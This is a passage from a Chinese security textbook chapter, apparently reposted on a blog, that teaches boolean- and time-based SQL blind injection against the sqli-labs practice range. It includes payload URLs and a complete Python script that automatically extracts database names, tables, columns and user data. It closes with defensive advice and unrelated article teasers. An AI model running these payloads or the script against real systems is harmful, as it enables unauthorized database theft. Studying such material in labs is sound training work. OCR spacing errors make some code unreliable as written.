SQL盲注漏洞

 

 

在进行SQL注入攻击时,若确定有注入点但因页面没有回显位来显示数据, 导致无法获取有效信息时,就要进行SQL盲注。

 

 

 

 

 

 

5.3.1    简介

 

目前常用的SQL盲注主要分以下两类:

·基于布尔的盲注:当页面没有回显位、不会输出SQL语句报错信息时,通过 返回页面响应的正常或不正常的情况来进行注入。

·基于时间的盲注:当页面没有回显位、不会输出SQL语句报错信息、不论 SQL语句的执行结果对错都返回一样的页面时,通过页面的响应时间来进行注 入。

上述两种盲注方式都存在的缺点就是需要耗费大量的精力去进行测试,因此 在渗透测中常使用工具或脚本来代替手工操作,完成烦琐的注入过程。

sqli-labs是由一位印度程序员编写的SQL注入练习靶场,包含多种类型的注入 方式,接下来将会在sqli-labs环境下具体讲解SQL盲注脚本的编写过程。

 

 

 

 

 

5.3.2    基于布尔型SQL盲注检测

 

本节以sqli-labs靶场的第八关为例。该关的SQL查询语句为SELECT*FROM users WHERE id='$id'LIMIT 0 ,1。

如果盲注的结果正确,则会显示“You are in...........” ,如图5-5所示。

如果盲注的结果错误,则不会显示“You are in...........” ,如图5-6所示。

那么,我们只需要提前构造相应的注入语句,然后根据页面是否回显“You

are in...........”来进行判断即可,让脚本进行自动化操作。笔者已经构造好所需的

Payload ,代码如下所示:

>>> http://127 .0 .0 .1/sql/Less-8/?id=1 ' and if(length(database())=8,1,0) %23

# 获取数据库名

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if(ascii(subst r(database(),1,1))=115, 1,0) %23

# 获取数据库表的数量

>>> http://127 .0 .0 .1/sql/Less-8/?id=1 ' and if((select count(*)table_name

from information_schema .tables where table_schema= 'security ')=4,1,0) %23

# 获取数据库表名称的长度

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if((select LENGTH(table_name) from information_schema .tables where table_schema= 'security ' limit 1,1)=

8,1,0) %23

# 获取数据库表名

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if(ascii(subst r((select table_name

from information_schema .tables where table_schema= 'security ' limit 0,1), 1,1))=101,1,0) %23

# 获取表的字段数量

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if((select count(column_name) from

information_schema .columns where table_schema= 'security ' and table_name= 'users ')=3,1,0) %23

# 获取字段的长度

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if((select length(column_name) from

information_schema .columns where table_schema= 'security ' and table_name= 'users ' limit 0,1)=2,1,0) %23

# 获取表的字段

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if(ascii(subst r((select column_name  from information_schema .columns where table_schema= 'security ' and table _name= 'users ' limit 0,1),1,1))=105,1,0) %23

# 获取字段数据的数量

>>> http://127 .0 .0 .1/Less-8/?id=1 'and if ((select count(username) from

users)=13,1,0) %23

# 获取字段数据的长度

>>> http://127 .0 .0 .1/Less-8/?id=1 'and if ((select length(username) from

users limit 0,1)=4,1,0) %23

# 获取字段数据

>>> http://127 .0 .0 .1/Less-8/?id=1 'and if (ascii(subst r((select username

from users limit 0,1),1,1))=68,1,0) %23

 

 

 

 

 

图5-6    布尔注入结果错误

1)写入脚本信息,导入模块,定义存储数据库数据的变量且定义一个request 对象用来进行请求,代码如下:

 

#!/usr/bin/python3

# -*- coding: utf-8 -*-

 

import requests

import optparse

 

# 存放数据库名的变量

DBName = ""

# 存放数据库表的变量

DBTables = []

# 存放数据库字段的变量

DBColumns = []

# 存放数据字典的变量,键为字段名,值为字段数据列表

DBData = {}

# 若页面返回真,则会出现“You are in . . . . . . . . . . .”

flag = "You are in . . . . . . . . . . ."

# 设置重连次数以及将连接改为短连接

# 防止因为HTTP连接数过多导致的 Max retries exceeded with url问题

requests .adapters .DEFAULT_RETRIES = 5

conn = requests .session()

conn .keep_alive = False

2)编写主函数,用来调用各个函数进行自动化注入,代码如下:

 

 

 

 

 

 

# 盲注主函数

def StartSqli(url) :

GetDBName(url)

print("[+]当前数据库名 :{0}" .format(DBName))

GetDBTables(url,DBName)

print("[+]数据库{0}的表如下 :" .format(DBName))

for item in range(len(DBTables)) :

print("(" + str(item + 1) + ")" + DBTables[item])

tableIndex = in t(input("[*]请输入要查看的表的序号 :")) - 1

GetDBColumns(url,DBName,DBTables[tableIndex])

while True:

print("[+]数据表{0}的字段如下 :" .format(DBTables[tableIndex]))

for item in range(len(DBColumns)) :

print("(" + str(item + 1) + ")" + DBColumns[item])

columnIndex = in t(input("[*]请输入要查看的字段的序号(输入0退出) :"))-1 if(columnIndex == -1) :

break

else:

GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])

 

3)编写获取数据库名的函数,根据得到的URL获取数据库名并把最后的结 果存入DBName:

def GetDBName(url) :

# 引用全局变量DBName,用来存放网页当前使用的数据库名

global DBName

print("[-]开始获取数据库名的长度")

# 保存数据库名长度的变量

DBNameLen = 0

# 用于检查数据库名长度的payload

payload = " ' and if(length(database())={0},1,0) %23"

# 把URL和payload进行拼接,得到最终请求的URL

targetUrl = url + payload

# 用for循环来遍历请求,得到数据库名的长度

for DBNameLen in range(1, 99) :

# 对payload中的参数进行赋值猜解

res = conn .get(targetUrl.format(DBNameLen))

# 判断flag是否在返回的页面中

if flag in res .content.decode("utf-8") :

print("[+]数据库名的长度 :" + str(DBNameLen))

break

print("[-]开始获取数据库名")

payload = " ' and if(ascii(subst r(database(),{0},1))={1},1,0) %23"

targetUrl = url + payload

# a表示subst r()函数的截取起始位置

for a in range(1, DBNameLen+1) :

# b表示在ASCII码中33~126位可显示的字符

for b in range(33, 127) :

res = conn .get(targetUrl.format(a,b))

if flag in res .content.decode("utf-8") :

DBName += chr(b)

print("[-]"+ DBName)

break

4)编写获取数据库表的函数,根据获取到的URL和数据库名获取数据库中 的表,并把结果以列表的形式存入DBTables:

 

# 获取数据库表的函数

def GetDBTables(url, dbname) :

global DBTables

# 存放数据库表数量的变量

 

 

 

 

 

DBTableCount = 0

print("[-]开始获取{0}数据库表数量 :" .format(dbname))

# 获取数据库表数量的payload

payload = " ' and if((select count(*)table_name from information_schema . tables where table_schema= '{0} ')={1},1,0) %23"

targetUrl = url + payload

# 开始遍历获取数据库表的数量

for DBTableCount in range(1, 99) :

res = conn .get(targetUrl.format(dbname, DBTableCount))

if flag in res .content.decode("utf-8") :

print("[+]{0}数据库中表的数量为 :{1}" .format(dbname, DBTableCount)) break

print("[-]开始获取{0}数据库的表" .format(dbname))

# 遍历表名时临时存放表名长度的变量

tableLen = 0

# a表示当前正在获取表的索引

for a in range(0,DBTableCount) :

print("[-]正在获取第{0}个表名" .format(a+1))

# 先获取当前表名的长度

for tableLen in range(1, 99) :

payload = " ' and if((select LENGTH(table_name) from

information_schema .tables where table_schema= '{0} '

limit {1},1)={2},1,0) %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbname, a, tableLen))

if flag in res .content.decode("utf-8") :

break

# 开始获取表名

# 临时存放当前表名的变量

table = ""

# b表示当前表名猜解的位置

for b in range(1, tableLen+1) :

payload = " ' and if(ascii(subst r((select table_name from

information_schema .tables where table_schema= '{0} ' limit {1},1),{2},1))={3},1,0) %23"

targetUrl = url + payload

# c表示在ASCII码中33~126位可显示的字符

for c in range(33, 127) :

res = conn .get(targetUrl.format(dbname, a, b, c))

if flag in res .content.decode("utf-8") :

table += chr(c)

print(table)

break

# 把获取到的表名加入DBTables

DBTables .append(table)

# 清空table,用来继续获取下一个表名

table = ""

5)编写获取表字段的函数,根据获取的URL 、数据库名和数据库表,获取 表的字段并把结果以列表的形式存入DBColumns:

def GetDBColumns(url, dbname, dbtable) :

global DBColumns

# 存放字段数量的变量

DBColumnCount = 0

print("[-]开始获取{0}数据表的字段数 :" .format(dbtable))

for DBColumnCount in range(99) :

payload = " ' and if((select count(column_name) from information_  schema .columns where table_schema= '{0} ' and table_name= '{1} ')

={2},1,0) %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbname, dbtable, DBColumnCount)) if flag in res .content.decode("utf-8") :

print("[-]{0}数据表的字段数为 :{1}" .format(dbtable, DBColumnCount))

break

# 开始获取字段的名称

 

 

 

 

 

# 保存字段名的临时变量

column = ""

# a表示当前获取字段的索引

for a in range(0, DBColumnCount) :

print("[-]正在获取第{0}个字段名" .format(a+1))

# 先获取字段的长度

for columnLen in range(99) :

payload = " ' and if((select length(column_name) from information_ schema .columns where table_schema= '{0} ' and table_name= '{1} '  limit {2},1)={3},1,0) %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbname, dbtable, a, columnLen)) if flag in res .content.decode("utf-8") :

break

# b表示当前字段名猜解的位置

for b in range(1, columnLen+1) :

payload = " ' and if(ascii(subst r((select column_name from

information_schema .columns where table_schema= '{0} ' and

table_name= '{1} ' limit {2},1),{3},1))={4},1,0) %23"

targetUrl = url + payload

# c表示在ASCII码中33~126位可显示的字符

for c in range(33, 127) :

res = conn .get(targetUrl.format(dbname, dbtable, a, b, c)) if flag in res .content.decode("utf-8") :

column += chr(c)

print(column)

break

# 把获取到的字段名加入DBColumns

DBColumns .append(column)

# 清空column,用来继续获取下一个字段名

column = ""

6)编写数据获取函数,根据获取的URL 、数据表名和数据表字段来获取数 据。数据以字典的形式存放,键为字段名,值为字段数据形成的列表:

# 获取表数据的函数

def GetDBData(url,dbtable,dbcolumn) :

global DBData

# 先获取字段的数据数量

DBDataCount = 0

print("[-]开始获取{0}表{1}字段的数据数量" .format(dbtable, dbcolumn))

for DBDataCount in range(99) :

payload = "'and if ((select count({0}) from {1})={2},1,0)  %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbcolumn, dbtable, DBDataCount)) if flag in res .content.decode("utf-8") :

print("[-]{0}表{1}字段的数据数量为 :{2}" .format(dbtable, dbcolumn, DBDataCount))

break

for a in range(0, DBDataCount) :

print("[-]正在获取{0}的第{1}个数据" .format(dbcolumn, a+1))

# 先获取这个数据的长度

dataLen = 0

for dataLen in range(99) :

payload = "'and if ((select length({0}) from {1} limit {2},1) ={3},1,0)  %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbcolumn, dbtable, a, dataLen)) if flag in res .content.decode("utf-8") :

print("[-]第{0}个数据长度为 :{1}" .format(a+1, dataLen))

break

# 临时存放数据内容变量

data = ""

# 开始获取数据的具体内容

# b表示当前数据内容猜解的位置

for b in range(1, dataLen+1) :

for c in range(33, 127) :

 

 

 

 

 

payload = "'and if (ascii(subst r((select {0} from {1} limit {2},1),{3},1))={4},1,0)  %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbcolumn, dbtable, a, b, c)) if flag in res .content.decode("utf-8") :

data += chr(c)

print(data)

break

# 放到以字段名为键,值为列表的字典中

DBData .setdefault(dbcolumn,[]) .append(data)

print(DBData)

# 把data清空,继续获取下一个数据

data = ""

 

7)编写主函数,用来获取目标的URL并传递给StartSqli:

if __name__ == '__main__ ' :

parser = optparse .OptionParser( 'usage: python %prog -u url \n\n ' 'Example: python %prog  -u http://192 .168 .61 .1/sql/Less-8/?id=1\n ')

# 目标URL参数-u

parser .add_option( '-u ', '--url ', dest= 'targetURL ',default= 'http://

127.0.0.1/sql/Less-8/?id=1', type= 'string ',help= 'target URL ')

(options, args) = parser .parse_args()

StartSqli(options .targetURL)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

5.3.3    基于时间型SQL盲注检测

 

本节以sqli-labs靶场的第九关为例。该关的SQL查询语句为SELECT*FROM users WHERE id='$id'LIMIT 0 ,1。

这关不管语句正确还是错误,页面始终显示“Your are in...........” ,如图5-7所

示,所以我们只能通过基于时间的盲注方法来获取数据,根据页面的返回时间来 判断结果。

 

完成注入过程所需的Payload的代码如下:

# 判断数据库名的长度

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if(length(database())=8,sleep(5), 0) %23

# 获取数据库名

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if(ascii(subst r(database(),1,1)) =115,sleep(5),0)%23

# 获取数据库中表的数量

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select count(table_name) from

information_schema .tables where table_schema= 'security ' )=4,sleep(5),0) %23

# 获取数据库表的长度

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select length(table_name)

from information_schema .tables where table_schema= 'security ' limit 0,1)= 6,sleep(5),0) %23

# 获取数据库表

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if(ascii(subst r((select table_

name from information_schema .tables where table_schema= 'security ' limit 0,1),1,1))=101,sleep(5),0)%23

# 获取数据库表中字段的数量

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select count(column_name) from information_schema .columns where table_schema= 'security ' and

table_name= 'users ')=3,sleep(5),0) %23

# 获取表字段的长度

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select length(column_name) from information_schema .columns where table_schema= 'security ' and

table_name= 'users ' limit 0,1)=2,sleep(5),0) %23

 

 

 

 

# 获取数据库字段

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if(ascii(subst r((select column_ name from information_schema .columns where table_schema= 'security ' and table_name= 'users ' limit 0,1),1,1))=105,sleep(5),0) %23

# 获取字段数据的数量

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select count(username) from users)=13,sleep(5),0) %23

# 获取字段数据的长度

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select length(username) from users limit 0,1)=4,sleep(5),0) %23

# 获取数据内容

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if(ascii(subst r((select username from users limit 0,1),1,1))=68,sleep(5),0) %23

 

本节的代码与基于布尔的盲注脚本十分相似,不同之处在于此处脚本需要用 到time模块,判断结果的语句和所使用的Payload不相同。以下将列出部分代码, 读者可当作练习自行完成编写,若有疑问,可参考源代码。

获取数据库名的函数代码如下:

# 获取数据库名的函数

def GetDBName(url) :

# 引用全局变量DBName,用来存放网页当前使用的数据库名

global DBName

print("[-]开始获取数据库名的长度")

# 保存数据库名长度的变量

DBNameLen = 0

# 用于检查数据库名长度的payload

payload = " ' and if(length(database())={0},sleep(5),0) %23"

# 把URL和payload进行拼接,得到最终的请求URL

targetUrl = url + payload

# 用for循环来遍历请求,得到数据库名的长度

for DBNameLen in range(1, 99) :

# 开始时间

timeStart = time .time()

# 开始访问

res = conn .get(targetUrl.format(DBNameLen))

# 结束时间

timeEnd = time .time()

# 判断时间差

if timeEnd - timeStart >= 5:

print("[+]数据库名的长度 :" + str(DBNameLen))

break

print("[-]开始获取数据库名")

payload = " ' and if(ascii(subst r(database(),{0},1))={1},sleep(5),0)%23" targetUrl = url + payload

# a表示subst r()函数的截取起始位置

for a in range(1, DBNameLen+1) :

# b表示在ASCII码中33~126位可显示的字符

for b in range(33, 127) :

timeStart = time .time()

res = conn .get(targetUrl.format(a,b))

timeEnd = time .time()

if timeEnd - timeStart >= 5:

DBName += chr(b)

print("[-]"+ DBName)

break

下面测试一下效果。

 

 

 

 

 

获取数据库名如下所示:

获取数据库表如下所示:

 

 

 

 

 

获取字段数据,如下所示:

 

 

 

 

 

 

 

 

 

 

 

5.3.4    防御策略

 

SQL盲注属于SQL注入的一种方式。下面介绍的几种防御方法可以有效降低 SQL注入对网站的危害:

1)用参数化查询的方式代替动态SQL。

2)避免显示数据库的错误信息。

3)在服务器上安装Web应用程序防火墙(Web Application Firewall, WAF)。

4)限制数据库的权限。

5)对于数据库中的敏感信息进行加密保存。

6)根据需求升级数据库的版本,避免旧版数据库中的已知漏洞。

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/656461.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

股票是什么

一、证券是什么 有价证券,简称证券,是一种表示财产权的有价凭证,持有者可以依据此凭证,证明其所有权或债权等私权。例如:股票、债券等。 二、股票概念 (一)股票是什么? 股票是一种…

前端网站website

​1. 翻页组件 翻页参考网址 中国电影电视技术学会 插件地址 http://www.turnjs.com/ 2.人机验证组件 vue-puzzle-vcode https://gitee.com/beeworkshop/vue-puzzle-vcode?_fromgitee_search 3.图片剪裁 图片裁剪 官网:https://github.xyxiao.cn/vue-cropper/ …

Linux ---- Shell编程之正则表达式

一、正则表达式 ​ 由一类特殊字符及文本字符所编写的模式,其中有些字符(元字符)不表示字符字面意义,而表示控制或通配的功能,类似于增强版的通配符功能,但与通配符不同,通配符功能是用…

Boost.Test-如何将测试套件(源码文件)组织成工程、并执行测试

Boost.Test资源及示例的续篇 1.测试套件TestSuite的源码文件组织如下图 2.CMakeLists.txt需要自己编写,本例内容如下 cmake_minimum_required(VERSION 3.5.0 FATAL_ERROR) project(mytestmodule) enable_testing()# indicates the location of the boost instal…

OAK深度相机主机时钟同步提升10倍!

编辑:OAK中国 首发:oakchina.cn 喜欢的话,请多多👍⭐️✍ 内容可能会不定期更新,官网内容都是最新的,请查看首发地址链接。 ▌前言 Hello,大家好,这里是OAK中国,我是Ash…

近期作业总结(函数,递归,二进制)

二分查找函数 写一个二分查找函数 功能&#xff1a;在一个升序数组中查找指定的数值&#xff0c;找到了就返回下标&#xff0c;找不到就返回-1。 int bin_search(int arr[], int left, int right, int key) {int mid 0;while (left < right) {mid (right left) / 2;if…

【JavaScript】两种方法实现继承

JS继承-ES6-基于 class 实现继承 mdn 类 阮一峰 ES6-class mdn-super ES6中推出了class类,是用来创建对象的模板。 class可以看作是一个语法糖,它的绝大部分功能&#xff0c;ES5 都可以做到&#xff0c;新的class写法只是让对象原型的写法更加清晰、更像面向对象编程的语法而已…

【pytest系列】- assert断言的使用

&#x1f525; 交流讨论&#xff1a;欢迎加入我们一起学习&#xff01; &#x1f525; 资源分享&#xff1a;耗时200小时精选的「软件测试」资料包 &#x1f525; 教程推荐&#xff1a;火遍全网的《软件测试》教程 &#x1f4e2;欢迎点赞 &#x1f44d; 收藏 ⭐留言 &#x1…

【AI视野·今日Robot 机器人论文速览 第七十六期】Fri, 12 Jan 2024

AI视野今日CS.Robotics 机器人学论文速览 Fri, 12 Jan 2024 Totally 12 papers &#x1f449;上期速览✈更多精彩请移步主页 Daily Robotics Papers Topology-Driven Parallel Trajectory Optimization in Dynamic Environments Authors Oscar de Groot, Laura Ferranti, Dari…

WPOpenSocial实现WordPress的QQ登录

个人建站不可避免的需要自己搭建用户数据库的问题&#xff0c;可用户却往往因为注册繁琐而放弃浏览您的网站&#xff0c;由此可见&#xff0c;一个社交账号一键登录方式尤为重要。选择适合您网站需求的社交插件&#xff0c;可以提升用户互动&#xff0c;增加社交分享&#xff0…

分布式场景怎么Join

背景 最近在阅读查询优化器的论文&#xff0c;发现System R中对于Join操作的定义一般分为了两种&#xff0c;即嵌套循环、排序-合并联接。 考虑到我的领域是在处理分库分表或者其他的分区模式&#xff0c;这让我开始不由得联想我们怎么在分布式场景应用这个Join逻辑&#xff…

《Linux C编程实战》笔记:管道

从这节开始涉及进程间的通信&#xff0c;本节是管道。 管道是一种两个进程间进行单向通信的机制。因为管道传递数据的单向性&#xff0c;管道又称之为半双工管道。。管道的这一特点决定了其使用的局限性。 数据只能由一个进程流向另一个进程&#xff1b;如果要进行全双工通信…

计算机组成原理学习| Day1

学习目标&#xff1a; 博主介绍: 27dCnc 专题 : 计算机组成原理 &#x1f44d;&#x1f44d;&#x1f44d;&#x1f44d;&#x1f44d;&#x1f44d;&#x1f44d;&#x1f44d;&#x1f44d;&#x1f44d;&#x1f44d;&#x1f44d; ☆*: .&#xff61;. o(≧▽≦)o .&#x…

分享4款不能错过的修改照片尺寸的软件!

在当今这个数字化时代&#xff0c;照片已经成为我们分享生活、表达观点的重要方式。但是&#xff0c;你是否曾遇到过这样的问题&#xff1a;一张精美的照片因为尺寸不合适而无法在朋友圈中展现出最佳效果&#xff1f;不用担心&#xff0c;今天我们就来聊聊那些可以帮助你轻松修…

获取鼠标点击图片时候的坐标,以及利用html 中的useMap 和area 实现图片固定位置的点击事件

一 编写原因 应项目要求&#xff0c;需要对图片的固定几个位置分别做一个点击事件&#xff0c;响应不同的操作&#xff0c;如下图&#xff0c;需要点击红色区域&#xff0c;弹出不同的提示框&#xff1a; 二 获取点击图片时候的坐标 1. 说明 实现这以上功能的前提是需要确定需…

JVM-类的生命周期

类的生命周期概述 类的生命周期描述了一个类加载、使用、卸载的整个过程。整体可以分为&#xff1a; 加载 连接&#xff0c;其中又分为验证、准备、解析三个子阶段 初始化 使用 卸载 加载阶段 加载(Loading)阶段第一步是类加载器根据类的全限定名通过不同的渠道以二进制流的方…

【JavaScript】fetch

fetch Response Headers ajax&axios&fetch的关系: ajax&#xff1a;ajax 是一种基于原生 JavaScript 的异步请求技术。它使用 XMLHttpRequest 对象来发送请求和接收响应。 axios&#xff1a;axios 是一个基于 Promise 的 HTTP 客户端&#xff0c;可以在浏览器和 Node…

STM32——中断系统和外部中断EXTI

一、中断 1.1中断系统 中断系统是管理和执行中断的逻辑结构&#xff1b; 1.2中断 系统在执行主程序过程中&#xff0c;出现了特定的触发条件&#xff08;触发源&#xff09;&#xff0c;系统停止执行当前程序&#xff0c;转而去执行中断程序&#xff0c;执行完毕后&#xf…

什么是原型链?如何继承?

原型&#xff1a; 每个对象都可以有一个原型_proto_&#xff0c;这个原型还可以有它自己的原型&#xff0c;以此类推&#xff0c;形成一个原型链。查找特定属性的时候&#xff0c;我们先去这个对象里去找&#xff0c;如果没有的话就去它的原型对象里面去&#xff0c;如果还是没…

OllyDebug的使用方法. IDA Pro分析程序的控制流图,可以找到不同的函数入口点. 在汇编代码中定位特定函数可能是一个耗时且复杂的过程

实战 “OllyDbg” 是一个流行的Windows平台上的汇编级调试器&#xff0c;用于调试和分析二进制程序&#xff0c;尤其是用于逆向工程目的。使用OllyDbg的基本步骤如下&#xff1a; 安装和打开OllyDbg&#xff1a;首先&#xff0c;您需要在您的计算机上安装OllyDbg。完成安装后&…